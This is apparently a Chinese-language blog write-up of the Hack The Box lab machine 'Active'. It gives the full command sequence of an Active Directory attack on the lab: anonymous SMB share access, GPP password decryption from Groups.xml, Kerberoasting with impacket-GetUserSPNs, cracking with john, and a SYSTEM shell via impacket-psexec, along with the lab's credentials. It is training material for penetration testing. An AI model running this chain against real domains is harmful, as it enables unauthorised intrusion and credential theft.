HTB-Active


HTB-Active

一、思路概要

主要工具:

smbmap:查看SMB共享服务信息

smbclient:连接SMB服务

gpp-decrypt:解密主机密码

impacket-GetUserSPNs:获取SPN信息

impacket-psexec:登录主机,获取shell

二、信息收集

nmap扫端口服务

nmap -p- --min-rate 10000 -Pn -sT 10.10.10.100

nmap -A 10.10.10.100

用smbmap查看SMB共享服务

smbmap -H 10.10.10.100

SMB共享出来的Replication目录有只读权限,用smbclient匿名连接一下

smbclient //10.10.10.100/Replication -N

在如下目录,找到Groups.xml文件,没法直接读,尝试把它下载到本地kali(Groups.xml作用可以理解为域内主机的配置文件)

cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

smb连接窗口执行如下命令

get Groups.xml

本地kali执行如下命令

cat Groups.xml

看到主机用户和密码,用gpp-decrypt解密

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

尝试以admin用户连接smb服务,失败

smbclient -W 10.10.10.100 -U SVC_TGS //10.10.10.100/ADMIN$

以普通用户连接smb服务,成功

smbclient -W 10.10.10.100 -U SVC_TGS //10.10.10.100/USERS

读user.txt

cd SVC_TGS\Desktop\
get user.txt

三、权限提升

用如下命令获取SPN成功

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

数据是john可以爆破的格式,直接john爆破,得Administrator密码

john --wordlist=/usr/share/wordlists/rockyou.txt SPN.txt

用Administrator账户登录主机,成功获取system权限

impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100

读root.txt,Over!

type C:\Users\Administrator\Desktop\root.txt

参考

https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/windows-boxes/active-writeup-w-o-metasploit


文章作者: wa0er
版权声明: 本博客所有文章除特別声明外,均采用 CC BY-NC 4.0 许可协议。转载请注明来源 wa0er !
评论
  目录